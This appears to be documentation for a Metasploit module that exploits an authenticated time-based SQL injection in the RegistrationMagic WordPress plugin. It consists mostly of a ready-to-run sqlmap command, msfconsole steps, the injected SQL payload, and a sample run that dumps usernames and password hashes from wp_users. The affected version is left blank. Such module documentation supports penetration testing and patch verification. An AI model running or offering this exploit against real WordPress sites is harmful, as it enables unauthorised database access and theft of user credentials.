
2.8 KiB

Vulnerable Application

RegistrationMagic, a WordPress plugin, prior to is affected by an authenticated SQL injection via the task_ids[] parameter.

The plugin can be downloaded here

This module slightly replicates sqlmap running as:

sqlmap -u 'http://<IP>/wp-admin/admin-ajax.php?page=rm_ex_chronos_edit_task&rm_form_id=2' --data="action=rm_chronos_ajax&rm_chronos_ajax_action=duplicate_tasks_batch&task_ids[]=2" -p "task_ids[]" --technique T -T wp_users -C user_login,user_pass --dump --dbms mysql --cookie '<cookie>'

Verification Steps

  1. Install the plugin, use defaults
  2. Start msfconsole
  3. Do: use auxiliary/scanner/http/wp_registrationmagic_sqli
  4. Do: set rhosts [ip]
  5. Do: set username [username]
  6. Do: set password [password]
  7. Do: run
  8. You should get the users and hashes returned.


ACTION: List Users

This action lists COUNT users and password hashes.


If action List Users is selected (default), this is the number of users to enumerate. The larger this list, the more time it will take. Defaults to 1.


The username to login with. Defaults to ``.


The password to login with. Defaults to ``.


Registration Magic on Wordpress 5.7.5 on Ubuntu 20.04

[*] Processing registrationmagic.rb for ERB directives.
resource (registrationmagic.rb)> use auxiliary/scanner/http/wp_registrationmagic_sqli
resource (registrationmagic.rb)> set rhosts
rhosts =>
resource (registrationmagic.rb)> set verbose true
verbose => true
resource (registrationmagic.rb)> set username admin
username => admin
resource (registrationmagic.rb)> set password admin
password => admin
resource (registrationmagic.rb)> run
[*] Checking /wp-content/plugins/custom-registration-form-builder-with-submission-manager/readme.txt
[*] Found version in the plugin
[+] Vulnerable version of RegistrationMagic detected
[*] Using formid of: 74
[*] Enumerating Usernames and Password Hashes
[*] {SQLi} Executing (select group_concat(GPc) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) GPc from wp_users limit 3) PfXJX)
[*] {SQLi} Encoded to (select group_concat(GPc) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0xc,0)),ifnull(user_pass,repeat(0x24,0))) as binary) GPc from wp_users limit 3) PfXJX)
[*] {SQLi} Time-based injection: expecting output of length 124
[+] Dumped table contents:

 user_login  user_pass
 ----------  ---------
 admin       $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
 admin2      $P$BNS2BGBTHmjIgV0nZWxAZtRfq1l19p1
 editor      $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed